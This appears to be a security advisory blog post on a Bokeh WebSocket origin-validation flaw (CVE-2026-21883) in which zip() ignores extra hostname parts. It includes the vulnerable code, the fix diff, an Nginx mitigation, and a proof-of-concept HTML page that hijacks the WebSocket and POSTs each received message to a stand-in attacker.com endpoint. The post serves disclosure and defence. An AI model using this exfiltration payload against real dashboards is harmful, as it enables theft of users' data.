Feb 26, 2026·6 min read·22 visits
Bokeh's WebSocket origin validator used Python's `zip()` function, which stops comparing when the shortest list ends. Attackers can register subdomains starting with a trusted name (e.g., `trustedsite.corp.attacker.com`) to trick the server into accepting the connection, leading to full session hijacking.
A logic error in the Bokeh interactive visualization library allows attackers to bypass WebSocket Origin validation. By exploiting Python's `zip()` function behavior, attackers can craft malicious subdomains that mimic trusted origins, enabling Cross-Site WebSocket Hijacking (CSWSH) to exfiltrate data or manipulate server-side state.
Bokeh is the darling of the Python data science world. It takes heavy, server-side computation and spits out beautiful, interactive HTML/JS visualizations. To make those sliders slide and those graphs update in real-time, Bokeh relies heavily on WebSockets. It’s a persistent pipe between the browser and the backend Python process.
But here is the thing about WebSockets: they don't adhere to the Same-Origin Policy (SOP) in the way XHR or Fetch does. A browser will happily open a WebSocket connection to any server that asks for it, carrying the user's cookies along for the ride. It is up to the server to look at the Origin header and say, "Hey, you're coming from evil.com, get lost."
If that check fails—or in this case, gets a little too lazy—you enter the realm of Cross-Site WebSocket Hijacking (CSWSH). It’s essentially CSRF on steroids. Instead of sending a single blind request (like "buy stock"), the attacker gets a full, two-way communication channel. They can read the response. They can see the data. In the context of Bokeh, that means they can watch your internal dashboard right alongside you.
The root cause of CVE-2026-21883 is a classic case of "it works for valid input, so ship it." The vulnerability lies in src/bokeh/server/util.py, specifically inside a function called match_host. This function is supposed to take the incoming Origin header and compare it against a configured allowlist.
The developers made a fatal assumption about Python's zip() function. For those uninitiated in Pythonic foot-guns, zip(a, b) takes two lists and iterates over them together. Crucially, it stops as soon as the shortest list is exhausted. It doesn't throw an error; it doesn't warn you. It just quietly packs up and goes home.
Imagine you have an allowlist containing dashboard.corp. You split that into ['dashboard', 'corp']. Now imagine an attacker comes along with dashboard.corp.evil.net. Split that, and you get ['dashboard', 'corp', 'evil', 'net']. When you zip() them, the loop runs twice. 'dashboard' matches 'dashboard'. 'corp' matches 'corp'. The loop finishes. The code hits return True. The server opens the door wide.
Let's look at the crime scene. The match_host function was trying to be clever by splitting hostnames by periods to handle subdomains and wildcards. Here is the logic that doomed it:
# The Vulnerable Logic
def match_host(host: str, pattern: str) -> bool:
host_parts = host.split('.')
pattern_parts = pattern.split('.')
# They checked if the pattern was longer than the host...
if len(pattern_parts) > len(host_parts):
return False
# ...but forgot to check if the HOST was longer than the PATTERN.
for h, p in zip(host_parts, pattern_parts):
if h == p or p == '*':
continue
else:
return False
return TrueSee the gap? If host_parts is longer than pattern_parts, zip just ignores the extra parts (the .evil.net part). The code assumes that if it survived the loop, it's a match.
The fix (Commit cedd113) is almost comically simple. It enforces that the lengths must match exactly (unless wildcards are involved, which are handled separately).
# The Fix
- if len(pattern_parts) > len(host_parts):
- return False
+ if len(pattern_parts) != len(host_parts):
+ return FalseThis one-character change (> to !=) closes the vulnerability completely. It forces the validation to acknowledge the entire hostname provided by the client.
Exploiting this requires a bit of setup, but it is highly realistic in corporate environments where internal DNS names are predictable. Let's assume a target organization runs a Bokeh server at ws://analytics.internal.corp.
Step 1: Reconnaissance
The attacker needs to know the allowlist. Often, this is the FQDN of the server itself. If the server expects analytics.internal.corp, that is our target string.
Step 2: Infrastructure
The attacker registers a domain or configures a subdomain they control to start with the target string. For example, they register attacker.com and create a subdomain: analytics.internal.corp.attacker.com.
Step 3: The Trap
The attacker hosts a simple HTML page on analytics.internal.corp.attacker.com:
<!-- Hosted on attacker's domain -->
<script>
// Browser sends Origin: http://analytics.internal.corp.attacker.com
var ws = new WebSocket("ws://analytics.internal.corp/ws");
ws.onopen = function() {
console.log("We are in.");
};
ws.onmessage = function(msg) {
// Exfiltrate sensitive dashboard data to attacker server
fetch("https://attacker.com/log", { method: "POST", body: msg.data });
};
</script>Step 4: Execution
The attacker sends the link to a victim who has access to the internal analytics dashboard. When the victim clicks, the WebSocket handshake initiates. The browser sends the attacker's domain as the Origin. The Bokeh server, blinded by the zip() flaw, sees analytics.internal.corp... and approves the connection. The attacker now receives a live feed of the victim's data.
You might think, "So what? They see a scatter plot." But Bokeh is an interactive library. The communication channel handles events. If the dashboard has widgets—buttons that trigger database refreshes, sliders that adjust parameters, or text inputs that run queries—the attacker can trigger those too.
Because WebSockets are bidirectional, the attacker can send messages to the server as if they were the user. In a worst-case scenario where the dashboard allows executing SQL queries or Python code based on input (which is bad design, but we see it constantly), this becomes Remote Code Execution (RCE) or SQL Injection via WebSocket.
Even without RCE, the confidentiality loss is massive. These dashboards often display proprietary trading data, patient health metrics, or infrastructure status. Bypassing the Origin check effectively bypasses the firewall for the application layer.
If you are running Bokeh <= 3.8.1, you are vulnerable. The primary fix is to upgrade to 3.8.2 or later immediately. The patch is small and safe to backport if you are stuck on a legacy version.
However, relying solely on application-level checks is playing with fire. You should enforce Origin validation at your ingress point—your reverse proxy.
If you use Nginx, explicit string matching is your friend:
location /ws {
proxy_pass http://backend;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
# Strict check. No regex unless necessary.
if ($http_origin !~* "^https?://(analytics\.internal\.corp)$") {
return 403;
}
}By killing the request at the Nginx layer, the vulnerable Python code never even executes. Security in depth means never trusting a zip() loop with your perimeter security.
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U| Product | Affected Versions | Fixed Version |
|---|---|---|
Bokeh Bokeh Project | <= 3.8.1 | 3.8.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-1385 |
| Attack Vector | Network |
| CVSS Score | 4.5 (Medium) |
| Impact | Data Exfiltration / Session Hijacking |
| Root Cause | Logic Error in List Iteration |
| Patch Status | Available (v3.8.2) |
The application does not verify or incorrectly verifies the Origin header of a WebSocket connection, allowing an attacker to establish a connection from an unauthorized origin.